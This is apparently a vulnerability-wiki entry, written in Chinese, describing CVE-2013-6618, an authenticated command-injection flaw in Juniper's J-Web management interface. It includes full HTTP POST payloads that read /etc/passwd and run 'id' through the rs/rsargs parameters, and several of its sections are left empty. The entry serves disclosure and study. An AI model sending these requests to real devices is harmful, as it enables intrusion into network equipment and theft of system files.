Vulnerability-wiki

Juniper J-Web Remote Command Execution Vulnerability (CVE-2013-6618)

Juniper J-Web 远程命令执行漏洞 (CVE-2013-6618) 是一个严重的安全漏洞,影响 Juniper Junos 操作系统在多个版本中的 Web 管理界面 J-Web。该漏洞允许远程已认证用户通过构造特定请求,实现任意命令执行,进而访问敏感文件或控制设备。

漏洞影响范围:

应用层 → 系统层
需认证,但攻击者可在认证后获取完整系统控制权限。


工作原理

攻击者通过向 jsdm/ajax/port.php 页面发送特制的 POST 请求,利用 rsargs 参数进行命令注入。由于该接口处理用户传入参数时缺乏有效校验,攻击者可执行任意函数,如读取系统文件、执行命令等。

请求示例:

POST /jsdm/ajax/port.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

rs=file_get_contents&rsargs[]=/etc/passwd

上述请求中,rs=file_get_contents 指定了 PHP 函数,rsargs[]=/etc/passwd 则传递了读取的目标路径。若成功执行,将直接返回目标系统的 /etc/passwd 文件内容。

根本原因:


攻击示例与利用场景

1. 读取系统敏感文件

POST /jsdm/ajax/port.php HTTP/1.1
Host: 192.168.0.1

rs=file_get_contents&rsargs[]=/etc/passwd

效果: 攻击者成功读取系统用户信息文件 /etc/passwd

2. 任意 PHP 函数执行(根据服务器配置)

例如:

rs=system&rsargs[]=id

效果: 若服务器允许该行为,则可直接执行 id 命令,返回执行结果。


漏洞影响版本

受影响的 Junos 版本包括:


风险评级与漏洞编号


参考资料


📝 作者:ahlien 📧 邮箱:mfs24@mails.tsinghua.edu.cn
🏫 单位:Tsinghua University
📅 最后更新时间:2025-07-30